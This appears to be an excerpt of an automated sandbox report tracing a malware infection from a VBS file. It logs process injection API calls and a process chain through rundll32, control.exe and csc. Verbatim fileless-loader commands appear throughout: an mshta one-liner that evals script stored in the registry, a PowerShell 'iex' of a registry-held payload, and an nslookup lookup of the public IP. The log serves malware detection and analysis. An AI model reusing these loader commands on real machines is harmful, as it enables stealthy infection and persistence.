Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05575166 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0558FBB9 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05590BAB NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E8B90 NtMapViewOfSection, |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E5B80 NtCreateSection, |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3EE95C NtSetContextThread,NtUnmapViewOfSection, |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E1950 NtWriteVirtualMemory, |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3EE860 NtQueryInformationProcess, |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F20A4 NtQueryInformationToken,NtQueryInformationToken, |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3FA8F0 NtSetInformationProcess,CreateRemoteThread,ResumeThread, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000CE860 NtQueryInformationProcess, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000D20A4 NtQueryInformationToken,NtQueryInformationToken,NtClose, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000DA8F0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000DD110 RtlAllocateHeap,NtQueryInformationProcess, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000CE95C NtSetContextThread,NtUnmapViewOfSection,NtClose, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C1950 NtWriteVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C5B80 NtCreateSection, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C8B90 NtMapViewOfSection, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000BFCA8 NtAllocateVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000B4580 NtReadVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000EF004 NtProtectVirtualMemory,NtProtectVirtualMemory, |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AD20A4 NtQueryInformationToken,NtQueryInformationToken,NtClose, |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8ACE860 NtQueryInformationProcess, |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AEF004 NtProtectVirtualMemory,NtProtectVirtualMemory, |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\345678.vbs' |
Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding |
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer |
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer |
Source: unknown | Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding |
Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding |
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline' |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES36.tmp' 'c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP' |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline' |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC9.tmp' 'c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP' |
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76A9.bi1' |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com |
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer |
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer |
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline' |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline' |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES36.tmp' 'c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP' |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC9.tmp' 'c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP' |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76A9.bi1' |
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com |